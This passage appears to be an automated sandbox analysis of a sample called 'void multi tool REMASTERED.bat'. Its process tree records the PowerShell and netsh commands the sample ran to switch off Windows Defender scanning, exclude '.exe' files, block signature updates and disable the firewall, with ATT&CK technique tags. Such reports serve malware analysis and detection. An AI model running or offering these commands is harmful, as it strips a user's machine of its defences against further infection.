                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                      3⤵
                      • Command and Scripting Interpreter: PowerShell
                      PID:3112
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ScanScheduleDay 8
                      3⤵
                      • Command and Scripting Interpreter: PowerShell
                      PID:3040
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" netsh advfirewall set allprofiles state off
                      3⤵
                      • Command and Scripting Interpreter: PowerShell
                      PID:328
                      • C:\Windows\system32\netsh.exe
                        "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                        4⤵
                        • Modifies Windows Firewall
                        • Event Triggered Execution: Netsh Helper DLL
                        PID:6296
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "powershell" Get-MpPreference -verbose
                      3⤵
                        PID:3412
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                        3⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:6484
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                        3⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:6516
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                        3⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:6580
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                        3⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:6896
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                        3⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:6940
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                        3⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:7036
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ScanScheduleDay 8
                        3⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:2436
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                        3⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:5320
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                        3⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:6300
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension ".exe"
                        3⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:1864
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\void multi tool REMASTERED.bat" "
                      2⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of WriteProcessMemory
                      PID:4932
                      • C:\Windows\SysWOW64\chcp.com
                        chcp 65001
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:2684
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/t7PfdVvCah
                        3⤵
                        • Enumerates system info in registry
                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                        • Suspicious use of FindShellTrayWindow
                        PID:5324
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x140,0x144,0x148,0x11c,0x14c,0x7ffb7b0746f8,0x7ffb7b074708,0x7ffb7b074718
                          4⤵
                            PID:3680
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
                            4⤵
                              PID:6040
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 /prefetch:3
                              4⤵
                                PID:5232
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:8
                                4⤵
                                  PID:3600
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
                                  4⤵
                                    PID:6060
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
                                    4⤵
                                      PID:4908
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
                                      4⤵
                                        PID:4464
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4248 /prefetch:8
                                        4⤵
                                          PID:3656
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4940 /prefetch:8
                                          4⤵
                                          • Modifies registry class
                                          PID:1248
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5348 /prefetch:8
                                          4⤵
                                            PID:844
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                                            4⤵
                                            • Drops file in Program Files directory
                                            PID:956
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x110,0x114,0x10c,0x108,0x298,0x7ff66fdd5460,0x7ff66fdd5470,0x7ff66fdd5480
                                              5⤵
                                                PID:3308
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5348 /prefetch:8
                                              4⤵
                                                PID:5888
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6220 /prefetch:1
                                                4⤵
                                                  PID:5720
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6184 /prefetch:1
                                                  4⤵
                                                    PID:5756
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6604 /prefetch:1
                                                    4⤵
                                                      PID:5832
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
                                                      4⤵
                                                        PID:3732
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,15997341129288253143,13421243481605082015,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6272 /prefetch:1
                                                        4⤵
                                                          PID:4560
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/t7PfdVvCah
                                                        3⤵
                                                        • Enumerates system info in registry
                                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                        • Suspicious use of FindShellTrayWindow
                                                        PID:4588
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffb7b0746f8,0x7ffb7b074708,0x7ffb7b074718
                                                          4⤵
                                                            PID:4856
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,18190224086679955416,7921569506161228273,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2040 /prefetch:2
                                                            4⤵
                                                              PID:3372
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2024,18190224086679955416,7921569506161228273,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
                                                              4⤵
                                                                PID:5460
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2024,18190224086679955416,7921569506161228273,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8
                                                                4⤵
                                                                  PID:4908
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,18190224086679955416,7921569506161228273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
                                                                  4⤵
                                                                    PID:1560
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,18190224086679955416,7921569506161228273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
                                                                    4⤵
                                                                      PID:1688
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,18190224086679955416,7921569506161228273,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4288 /prefetch:1
                                                                      4⤵
                                                                        PID:5344
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2024,18190224086679955416,7921569506161228273,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5468 /prefetch:8
                                                                        4⤵
                                                                          PID:5060
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2024,18190224086679955416,7921569506161228273,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5476 /prefetch:8
                                                                          4⤵
                                                                          • Modifies registry class
                                                                          PID:2084
                                                                  • C:\Windows\system32\wbem\WmiApSrv.exe
                                                                    C:\Windows\system32\wbem\WmiApSrv.exe
                                                                    1⤵
                                                                      PID:2496
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                      1⤵
                                                                      • Drops file in Windows directory
                                                                      • Enumerates system info in registry
                                                                      • Modifies data under HKEY_USERS
                                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      • Suspicious use of SendNotifyMessage
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:1528
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffb7942cc40,0x7ffb7942cc4c,0x7ffb7942cc58
                                                                        2⤵
                                                                          PID:3208
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1904,i,16721692576452008338,8438145843275216967,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=1900 /prefetch:2
                                                                          2⤵
                                                                            PID:3800
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2212,i,16721692576452008338,8438145843275216967,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2228 /prefetch:3
                                                                            2⤵
                                                                              PID:3260
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2276,i,16721692576452008338,8438145843275216967,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2464 /prefetch:8
                                                                              2⤵
                                                                                PID:4864
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,16721692576452008338,8438145843275216967,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3168 /prefetch:1
                                                                                2⤵
                                                                                  PID:2984
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3192,i,16721692576452008338,8438145843275216967,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3212 /prefetch:1
                                                                                  2⤵
                                                                                    PID:4788
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4564,i,16721692576452008338,8438145843275216967,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4524 /prefetch:1
                                                                                    2⤵
                                                                                      PID:4316
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4832,i,16721692576452008338,8438145843275216967,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4876 /prefetch:8
                                                                                      2⤵
                                                                                        PID:5848
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4956,i,16721692576452008338,8438145843275216967,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4964 /prefetch:8
                                                                                        2⤵
                                                                                          PID:5908
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4924,i,16721692576452008338,8438145843275216967,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4836 /prefetch:8
                                                                                          2⤵
                                                                                            PID:6092
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5108,i,16721692576452008338,8438145843275216967,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4928 /prefetch:8
                                                                                            2⤵
                                                                                              PID:4760
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5036,i,16721692576452008338,8438145843275216967,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5340 /prefetch:8
                                                                                              2⤵
                                                                                                PID:5304
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4880,i,16721692576452008338,8438145843275216967,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4736 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:2444
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5368,i,16721692576452008338,8438145843275216967,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5440 /prefetch:2
                                                                                                  2⤵
                                                                                                    PID:6060
                                                                                                • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                  1⤵
                                                                                                    PID:4536
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                    1⤵
                                                                                                      PID:5896
                                                                                                    • C:\Windows\system32\taskmgr.exe
                                                                                                      "C:\Windows\system32\taskmgr.exe" /0
                                                                                                      1⤵
                                                                                                      • Checks SCSI registry key(s)
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                      PID:2304
                                                                                                    • C:\Windows\system32\taskmgr.exe
                                                                                                      "C:\Windows\system32\taskmgr.exe" /0
                                                                                                      1⤵
                                                                                                      • Checks SCSI registry key(s)
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                      PID:5160
                                                                                                    • C:\Windows\System32\oobe\UserOOBEBroker.exe
                                                                                                      C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
                                                                                                      1⤵
                                                                                                      • Drops file in Windows directory
                                                                                                      PID:5220
                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
                                                                                                      C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
                                                                                                      1⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:4252
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
                                                                                                      1⤵
                                                                                                        PID:3584
                                                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:4592
                                                                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:2988
                                                                                                          • C:\Windows\system32\AUDIODG.EXE
                                                                                                            C:\Windows\system32\AUDIODG.EXE 0x4ec 0x410
                                                                                                            1⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:5824
                                                                                                          • C:\Windows\System32\CompPkgSrv.exe
                                                                                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                            1⤵
                                                                                                              PID:2172
                                                                                                            • C:\Windows\System32\CompPkgSrv.exe
                                                                                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:3800
                                                                                                              • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                1⤵
                                                                                                                  PID:5416

                                                                                                                Network

                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                Replay Monitor

                                                                                                                Loading Replay Monitor...

                                                                                                                Downloads

                                                                                                                • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                  MD5

                                                                                                                  d2fb266b97caff2086bf0fa74eddb6b2

                                                                                                                  SHA1

                                                                                                                  2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

                                                                                                                  SHA256

